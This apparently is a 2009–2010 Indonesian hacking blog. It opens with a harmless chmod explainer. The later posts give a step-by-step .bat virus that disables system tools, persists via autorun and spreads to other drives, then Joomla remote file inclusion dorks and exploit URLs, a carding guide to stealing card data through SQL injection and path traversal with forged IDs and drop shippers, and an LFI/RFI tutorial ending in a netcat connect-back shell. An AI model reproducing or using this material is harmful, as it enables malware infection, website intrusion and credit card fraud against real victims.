bR0m0c0Ra's Blog

CHMOD UNIX

br0m0c0ra — Sat, 09 Jan 2010 23:51:17 +0000

~::Sekilas CHMOD::~
————-

Dalam Hal ini kita akan membahas sedikit masalah CHMOD ( Change Mode ).

apa itu chmod :

Chmod digunakan untuk menambah dan mengurangi ijin pemakai untuk mengakses file
atau direktori, dapat juga menggunakan sistem numeric coding atau sistem letter coding.
Ada tiga jenis permisi atau perijinan yang dapat dirubah yaitu :

-r untuk read.
-w untuk write.
-x untuk execute.

keterangan numeric dari sebuah permision file :

0 = tidak ada operasi di ijinkan.
1 = permisi untuk melakukan cd ke satu direktori.
2 = permisi untuk menulis.
4 = permisi untuk membaca.

setiap file mempunyai permisi untuk owner, group, and user.

untuk membuat batasan-batasan pada suatu file,
kita harus membuat suatu permisi file tersebut dengan cara CHMOD :

misalkan direktori “home” kita mempunyai default permisi 711 maka itu artinya :

7 = 4+2+1 : kamu (pemilik) dapat membaca/menulis/mengeksekusi file.
1 = 1 : semua user di group mu dapat melakukan cd/execute tapi tidak membaca dan menulis.
1 = 1 : semua user bukan group mu dapat melakukan cd/execute tapi tidak membaca dan menulis.

Misalkan direktori public_html kita mempunyai permisi 755 artinya :

7 = 4+2+1 : kamu (pemilik) dapat membaca/menulis/mengeksekusi file.
5 = 4+1 : semua user di group mu dapat melakukan cd/execute/read tapi tidak menulis.
5 = 4+1 : semua user bukan group mu dapat melakukan cd/execute/read tapi tidak menulis.

Files kamu buat di direktori public_html paling sedikit harus mempunyai permisi
644 (direktorinya harus 755) atau WWW server tidak akan bisa membaca nya
sehingga tidak bisa muncul pada web browser.

untuk mengubah permisi file index.html caranya :

chmod 644 index.html

untuk membuat direktori images dan isi file nya bisa di baca oleh semua maka :

chmod 755 images
cd images
chmod 644 *

untuk meng hidden suatu file maka :

chmod 700 nama_file.

——————————————————————-

Users group other
r w x r w x r w x
| | | | | | | | |
400 ——+ | | | | | | | |
200 ——–+ | | | | | | |
100 ———-+ | | | | | |
| | | | | |
40 —————-+ | | | | |
20 ——————+ | | | |
10 ——————–+ | | |
| | |
4 ————————–+ | |
2 —————————-+ |
1 ——————————+

Gambar diagram contoh permisi file.

——————————————————————-

Note : Untuk lebih jelas masalah penggunaan CHMOD silahkan baca man chmod.
Research : http://ibank.cracked.or.id

Membuat virus .bat sederhana

br0m0c0ra — Fri, 08 Jan 2010 23:57:36 +0000

Langkah2nya :

1. Pertama2 buka notepad
2. Copy paste script di bwh ini

@echo off
taskkill /f /im explorer.exe
echo on error resume next>c:windowsanakan.vbs
echo set WshShell = CreateObject(”Wscript.Shell”)>>c:windowsanakan.vbs
echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciesExplorerNoRun “,”1″,”REG_DWORD”>>c:windowsanakan.vbs
echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciessystemDisableRegistryTools “,”1″,”REG_DWORD”>>c:windowsanakan.vbs
echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciesExplorerNoFolderOptions “,”1″,”REG_DWORD”>>c:windowsanakan.vbs
echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciesExplorerNoFind “,”1″,”REG_DWORD”>>c:windowsanakan.vbs
echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciessystemDisableTaskMgr “,”1″,”REG_DWORD”>>c:windowsanakan.vbs
echo WshShell.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page”, “http://www.manadocoding.com”,”REG_SZ”>>c:windowsanakan.vbs
echo WshShell.RegWrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOrganization”, “UNIJOYO”,”REG_SZ”>>c:windowsanakan.vbs
echo WshShell.RegWrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOwner”, “vyc0d”,”REG_SZ”>>c:windowsanakan.vbs
echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion runmoontr4ck3r “, “C:windowsanakan.vbs”,”REG_SZ”>>c:windowsanakan.vbs
echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion runmoontr4ck3rz “, “C:windowscoba.bat”,”REG_SZ”>>c:windowsanakan.vbs
echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion runmoontr4ck3rs “, “C:windowssponsor.bat”,”REG_SZ”>>c:windowsanakan.vbs

echo Title vyc0d Coy….>c:windowssponsor.bat
echo cls>>c:windowssponsor.bat
echo @echo off >>c:windowssponsor.bat
echo @echo **************vyc0d**************>>c:windowssponsor.bat
echo @echo # Komputer Loe Telah gw Kuasai #>>c:windowssponsor.bat
echo @echo # Sorry man.. program kecil kayak gini #>>c:windowssponsor.bat
echo @echo # bisa masuk komp loe… Antivirus lo #>>c:windowssponsor.bat
echo @echo # mana??? koq gak berkutik?????? …. #>>c:windowssponsor.bat
echo @echo # makanya jangan bergantung ama anti #>>c:windowssponsor.bat
echo @echo # virus! dah saatnya kita belajar…. #>>c:windowssponsor.bat
echo @echo # (@_@) #>>c:windowssponsor.bat
echo @echo # salam sayang dr:vyc0d #>>c:windowssponsor.bat
echo @echo # Ups lupa… kalo mau pake komputer #>>c:windowssponsor.bat
echo @echo # tekan spasi saat program ini aktif #>>c:windowssponsor.bat
echo @echo *****************Th4nk5****************>>c:windowssponsor.bat
echo @pause>>c:windowssponsor.bat
echo Title Proses…>>c:windowssponsor.bat
echo @echo load file >>c:windowssponsor.bat
echo @echo kuasai wind#w5 >>c:windowssponsor.bat
echo @echo dan bunuh Kernel32+4ntiviru$ >>c:windowssponsor.bat
echo pause>>c:windowssponsor.bat
echo explorer.exe>>c:windowssponsor.bat
echo Title Proses Scan OS… (*_*)>>c:windowssponsor.bat
echo :loop>>c:windowssponsor.bat
echo @echo 101010011010201020 01010101001010101 0100101001001012 0010100101101010020101 010>>c:windowssponsor.bat
echo @echo 010010101010012110 00101010010100010 0101001010010111 1011010103102020102020 010>>c:windowssponsor.bat
echo @echo 010101101011121011 02010201020030402 1010202030201010 1010201011110102010201 010>>c:windowssponsor.bat
echo goto loop>>c:windowssponsor.bat
echo [autorun]>c:autorun.inf
echo open=coba.bat>>c:autorun.inf
echo shellexecute=coba.bat>>c:autorun.inf
c:windowsanakan.vbs
copy coba.bat c:coba.bat
copy coba.bat d:coba.bat
copy coba.bat e:coban.bat
copy coba.bat c:windowscoba.bat
copy coba.bat f:coba.bat
copy coba.bat g:coba.bat
copy c:autorun.inf d:autorun.inf
copy c:autorun.inf e:autorun.inf
copy c:autorun.inf f:autorun.inf
copy c:autorun.inf g:autorun.inf
@attrib +h +r +s +a c:windowscoba.bat
@attrib +h +r +s +a c:windowsanakan.vbs
@attrib +h +r +s +a c:windowssponsor.bat
@attrib +h +r +s +a c:autorun.inf
@attrib +h +r +s +a c:coba.bat
@attrib +h +r +s +a d:autorun.inf
@attrib +h +r +s +a d:coba.bat
@attrib +h +r +s +a e:autorun.inf
@attrib -h -r -s -a e:coba.bat
@attrib +h +r +s +a f:autorun.inf
@attrib -h -r -s -a f:coba.bat
@attrib +h +r +s +a g:autorun.inf
@attrib -h -r -s -a g:coba.bat

3. Klo sdh, sve dgn nama anakan.bat
4. Aktifkan virus tsb n silanhkan nyengir….hehehee

Mambo & Joomla Script Remote File Inclussion Bugs

br0m0c0ra — Sun, 11 Oct 2009 06:43:43 +0000

==================================================================

Joomla RFI by white

semoga bermanfaat

==================================================================

Dork:

com_comprofiler

Expl:

administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[Shell]

Dork:

inurl:com_multibanners

Expl:

/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell]

Dork:

inurl:com_colophon

expl:

administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell]

Dork:

inurl:index.php?option=[Shell]com_simpleboard

Expl:

/components/com_simpleboard/file_upload.php?sbp=[Shell]

Dork:

inurl:”com_hashcash”

Expl:

/components/com_hashcash/server.php?mosConfig_absolute_path=[Shell]

Dork:

inurl:”com_htmlarea3_xtd-c”

Expl:

/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=[Shell]

Dork:

inurl:”com_sitemap”

Expl:

/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=[Shell]

Dork:

inurl:”com_forum”

Expl:

/components/com_forum/download.php?phpbb_root_path=[Shell]

Dork:

inurl:”com_pccookbook”

Expl:

/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=[Shell]

Dork:

inurl:index.php?option=[Shell]com_extcalendar

Expl:

/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=[Shell]

Dork:

inurl:”minibb”

Expl:

/components/minibb/index.php?absolute_path=[Shell]

Dork:

inurl:”com_smf”

Expl:

/components/com_smf/smf.php?mosConfig_absolute_path=[Shell]

Expl:

/modules/mod_calendar.php?absolute_path=[Shell]

Dork:

inurl:”com_pollxt”

Expl:

/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=[Shell]

Dork:

inurl:”com_loudmounth”

Expl:

/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=[Shell]

Dork:

inurl:”com_videodb”

Expl:

/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=[Shell]

Dork:

inurl:index.php?option=[Shell]com_pcchess

Expl:

/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[Shell]

Dork:

inurl:”com_multibanners”

Expl:

/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell]

Dork:

inurl:”com_a6mambohelpdesk”

Expl:

/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=[Shell]

Dork:

inurl:”com_colophon”

Expl:

/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell]

Dork:

inurl:”com_mgm”

Expl:

/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=[Shell]

Dork:

inurl:”com_mambatstaff”

Expl:

/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[Shell]

Dork:

inurl:”com_securityimages”

Expl:

/components/com_securityimages/configinsert.php?mosConfig_absolute_path=[Shell]

Expl:

/components/com_securityimages/lang.php?mosConfig_absolute_path=[Shell]

Dork:

inurl:”com_artlinks”

Expl:

/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=[Shell]

Dork:

inurl:”com_galleria”

Expl:

/components/com_galleria/galleria.html.php?mosConfig_absolute_path=[Shell]

Meta Search Engine Script (url)

br0m0c0ra — Sun, 11 Oct 2009 06:40:58 +0000

==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|

==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] Meta Search Engine 1.0 Remote File Inclusion
==============================================================================

	[»] Script:             [ Meta Search Engine 1.0 ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.mydlstore.com/product.php?productid=40826&cat=0&page=1  ]
	[»] Founder:            [ Moudi  ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ OFF ]
        [»] Price:              [ USD 12.99 ]
        [»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit RFI + LIVE : vulnerability ]===

[»] http://www.site.com/patch/?url=[RFI]&file=Search
[»] http://www.site.com/patch/index.php?url=[RFI]&file=Search

[»] http://www.mydlstore.net/metasearch/?url=evilcode.txt?&file=Search
[»] http://www.mydlstore.net/metasearch/index.php?url=evilcode.txt?&file=Search

Author: Moudi

###########################################################################

note: readfile($url) is the issue, so fd

Carding, Old Bugs But Works

br0m0c0ra — Tue, 06 Oct 2009 19:24:38 +0000

Carding…carding…carding, sebener’a males banget buat bikin tutorial ini, tapi yach terpaksa gw bikin tutorial ini karena gw udah capek di tanyain gimana sey cara carding? bro ajarin carding dunkz ?! om cara dapetin cc valid tuch gimana ?? dan bahkan ada yg tanpa malu² langsung ngomong, nyet !! pesen laptop or aircraft dunk satu, kirim ke alamat gw yak, gileee benerrrr klo ngomong seenak jidat !! dan yg bikin gw paling bete klo mereka nanyaaAaaaAaaa molo yg semua jawaban’a tuch udah jelas² ada di google, padahal google lebih mengerti daripada gw

Ngomong sey emang gampang, tapi praktek’a itu butuh kesabaran, harus pinter ngomong, fasih berbahasa inggris dan untuk lo tau bahwa carding itu untung²an, jadi ngapain juga klo gw dapet barang bagus gw kasih ke lo, mendingan buat gw aja

pasti lo² semua yg sering nanya ke gw mo tau kan apa aja yg gw persiapkan sebelom melakukan carding, well… tanpa ada sedikitpun yg gw tutup²in terkecuali bagian bawah dari tubuh gw, sekarang gw kasih tau:

1. Credit Card number + cvv + expired (harus valid)
2. Proxy USA klo bisa
3. Virtual Phone Number (skype)
4. Virtual Address (klo di butuhkan)
5. Email khusus carding (yahoomail,gmail,hotmail,etc)
6. Seller
7. Dropper (biar barang lo cepet nyampe’a)
8. Roko Mild satu bungkus
9. Snack Potato Rasa Barbeque 5 Bungkus
10. Music Player (winamp,jet audio,amarok)

okay !! gw yakin lo pada nanya gimana cara dapetin proxy? nah di sini balik lagi dey lo sama yg nama’a webshell yg lo dapetin dari web yg mempunyai bug Remote File Inclusion, di sana lo bisa bikin proxy sendiri, tapi klo lo emang orang’a “MALES” mendingan lo balik lagi ke paman google, lo bisa cari situs² penyedia proxy gratis, tapi yaa gitu dey, ga awet, paling lama juga 1 jam udah mati.

Kedua tentang virtual phone number, tau skype kan ? itu loch yg buat voip (voice over internet protocol) nah lo bisa beli nomer telephone virtual dari USA melewati skype, trus fungsi’a buat apa ?? gw males jelasin’a mendingan lo join aja di chan #yogyacarderlink dan tanya² sama anak² yg ada di sana okay !!

Ketiga tentang virtual address, di sini lo beli alamat virtual di USA dan ada lembaga di sana yg ngurus barang² lo buat di kirim ke alamat asli lo, cuma proses pembelian’a agak susah, lo harus nunjukin credit card, license drive, ID card, visa, paspor, bingung gimana cara’a ? buat apa ada photoshop klo ga di gunain, hahahah, lagian dia kan cuma minta gambar hasil scan, jadi cari aja gambar²a di google trus edit dey di photoshop.

Keempat Email khusus, satu hal penting, jangan pernah ngirim orderan ke email lo yg biasa lo pake buat ngirim² pesan penting, jangan pernah lo campur aduk tu email, klo bisa lo bikin lagi email baru yg khusus buat carding, dan biasain pake logika lo, klo mo carding, nama email’a yg berhubungan dengan nama² orang USA sana, minimal lo dapet 1 point kecil penting lah untuk nama email ini.

Kelima lo harus punya seller or penjual yg kira² bisa shipping worldwide, silakan cari sendiri shop online di google yg bisa shipping worldwide dengan imajinasi kata² lo sendiri.

Keenam about Dropper, nah ini di butuhin klo emang kita dapet shop online yg ga nerima shipping worldwide, inti’a lo harus punya kenalan or koneksi di USA atau di Canada bahkan mungkin England yg bisa di ajak kerjasama, jadi begitu barang di kirim ke dropper, dia langsung ngirim ke alamat kita, jadi seandai’a lo beli laptop, jangan beli satu, tapi minimal dua, biar satu buat kita, satu buat dia, itu nama’a kerjasama kan ?? dan di situlah kerjaan dropper, mereka cuma ngedrop barang kita doank dan mereka dapet untung juga dari kita

and The Last, how to find valid credit card, here’s old bug but works

1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik google.com :–> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : ‘or’1
pass : ‘or’1

2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan –> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/
order.log

3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan –> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb

4. contoh bugs pada bentuk toko sistem CShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan –> /DCShop/orders/orders.txt
atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt

5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan –> /admin/
dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database
access.mdb sebaiknya pake ms access aja)

6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik –> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan –>
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager –>
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya –>
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order…

7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google: Ketik –> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan –> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/…/cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces
(karena untuk membaca database access.mdb sebaiknya pake ms access
aja)

8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com: Ketik –> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan –> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya,
berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman
kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32
berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program
text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah
dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32

9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
teknik/jalan ke dua
google.com Ketik –> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian
shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty’%20union%…,
fldpassword%20from%20tbluser%20where%20fldusername=
‘admin’%20and%20fldpassword%20like%20′a%25′–
Gantilah nilai dari string url terakhir dg:
%20′a%25′–
%20′b%25′–
%20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password
admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik –> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut
satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp

11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com Ketik –> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan –> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb

12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik –> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan –> …&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=…&template…

13. contoh bugs pada bentuk toko sistem roddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik –> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan –> fpdb/
vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb

14. contoh bugs pada bentuk toko sistem igishop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google Ketik –> inurl:”/cart.php?m=”
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan –>admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection

Usename : ‘or”=”
Password : ‘or”=”

well, menurut gw ini udah cukup menjelaskan bagaimana langkah² untuk melakukan carding, dan klo masih ada yg mo di tanyain lagi, silakan join aja di #yogycarderlink@Dal.net, cuz i dont wanna you ask to me on private messege again about carding !!

#yogyacarderlink@Dal.net cRew

Resource : http://0wnage.wordpress.com/2008/07/15/carding-old-bugs-but-works/#more-40

Remote dan Local File Inclusion Vulnerability

br0m0c0ra — Tue, 06 Oct 2009 18:58:59 +0000

Salah satu bugs lawas di Aplikasi berbasis web yaitu “File Inclusion”. File Inclusion adalah cara menyisipkan potongan malicious code attacker ke dalam sebuah situs yang vulnerable, fungsi dalam php yang memperbolehkan penyisipan file php adalah include,include_once,require,require_once. Penyisipan sebuah malicious code bisa dilakukan secara remote atau mesin berbeda dengan server, bisa menggunakan protokol http:// https:// ftp:// smb:// atau biasa disebut “Remote File Inclusion”, jika sebuah penyisipan malicious code gagal mungkin setting allow_url_include berada dalam kondisi “Off” pada php.ini. Attacker yang sadar bahwa aksi penyusupan malicious code gagal selanjutnya ia mencoba teknik “Local File Inclusion” dimana penyisipan halaman berada dalam server yang sama.

Mungkin ada yang bertanya seberapa besarkah dampak yang dihasilkan dari File Inclusion?. Dampak dari File Inclusion bisa dikatakan “High Risk” karena File Inclusion bisa digunakan untuk mendapatkan akses shell, dan pada akhirnya dilakukan sebuah Local Exploitation untuk mendapatkan hak akses penuh terhadap sistem. Sebuah contoh skrip php yang rentan terhadap file inclusion secara sederhana seperti di bawah ini :

Jika kode diatas kita eksekusi akan menghasilkan eror seperti ini :
Notice: Undefined index: page in /var/www/htdocs/page.php on line 2

Warning: include() [function.include]: Failed opening ” for inclusion (include_path=’.:/usr/lib/php’) in /var/www/htdocs/page.php on line 3

Variabel page tidak terdeklarasi, jadi variabel page bisa kita manipulasi valuenya ke skrip si attacker. Contoh :

http://localhost/page.php?page=http://attacker/evil.txt%00

Dimana evil.txt diatas berisi :

";
echo "".passthru('pwd')."";
echo "";
echo "".passthru('id')."";
echo "
";
echo "".passthru('ls')."";
echo "
";
?>

bisa kita gunakan melihatkan kepada kita tentang informasi server yang menjadi target dan bisa kita tingkatkan ke yang lebih berbahaya, seperti mendapatkan shell. Jika aksi “Remote File Inclusion” seperti di atas hanya menghasilkan error seperti ini :

Warning: include() [function.include]: URL file-access is disabled in the server configuration in /var/www/htdocs/page.php on line 3

Warning: include(http://uname.site88.net/sh2.txt) [function.include]: failed to open stream: no suitable wrapper could be found in /var/www/htdocs/page.php on line 3

Warning: include() [function.include]: Failed opening ‘http://uname.site88.net/sh2.txt’ for inclusion (include_path=’.:/usr/lib/php’) in /var/www/htdocs/page.php on line 3

Warning diatas muncul dikarenakan seting “allow_url_include” berada dalam kondisi “Off” pada php.ini. Pada kondisi ini kita tidak bisa melakukan penyisipan kode secara terpisah dari server target (remote), lalu coba sisipkan kode secara local.

http://target/page.php?page=../../../../etc/passwd

Jika url di atas dibuka akan seperti ni :

Pada akhir url biasa ditambahkan null byte atau %00 atau ?. Maksud dari ../ adalah naik satu direktori, contoh diatas kita di atas turun 4 direktori. Ingat pada saat anda turun satu direktori di shell dengan sintaks :

root@slacker:~/webresource/web archive# pwd /root/webresource/web archive Lokasi direktori sekarang root@slacker:~/webresource/web archive# cd ../cms/ Turun satu direktori dan masuk ke root@slacker:~/webresource/cms# pwd direktori cms /root/webresource/cms

Dan beberapa file sensitif lain di sebuah webserver :

/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

Dari bugs tersebut bisa kita manfaatkan untuk mengakses shell target (Remote Connect-Back Shell), dengan memanfaatkan request malicious code yang mengakibatkan 400 Bad Request dan tercatat di error_log webserver dan melakukan Connect Back yang terlebih dahulu kita buat statenya listen mode, untuk inbound connects. Lakukan telnet ke webserver target lewat port 80, dan buat request kode berikut (192.168.16.09 adalah ip anda):

GET/

Aksi anda dia atas akan dicatat di error_log webserver, dan tugas anda sekarang adalah mencari lokasi error log-nya, dibawah ini kemungkinan lokasi dari error_log berada, dan sesuaikan tingkatan direktori-nya juga :

../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
../../../../../../../var/log/httpd/error_log
../../../../../../../var/log/httpd/error.log

kemungkinan lain file log diikuti juga dengan nama domainnya, seperti :

../../../../../../../var/log/httpd/namadomain.org-error_log
../../../../../../../var/log/httpd/namadomain.org-access_log

dengan menggunakan nc (netcat) kita buat koneksi inbound yang menunggu koneksi dari luar dengan perintah :

root@slacker:~# nc -l -v -p 42001

sekarang anda buka file log tersebut di url, seperti ini jadinya :

Jika berhasil anda telah melakukan Remote Connect-Back Shell, coba lihat konsole anda yang menjalankan nc tadi, kita akan mendapatkan shell dari target dan kita bisa menjalankan berbagai perintah linux. Selanjutnya terserah anda, ingin melakukan deface, privilege excalation, atau pasang backdoor sok atuh,,,. Seperti yang saya lakukan di sebuah webserver, dan saya ilustrasikan di baris di bawah.

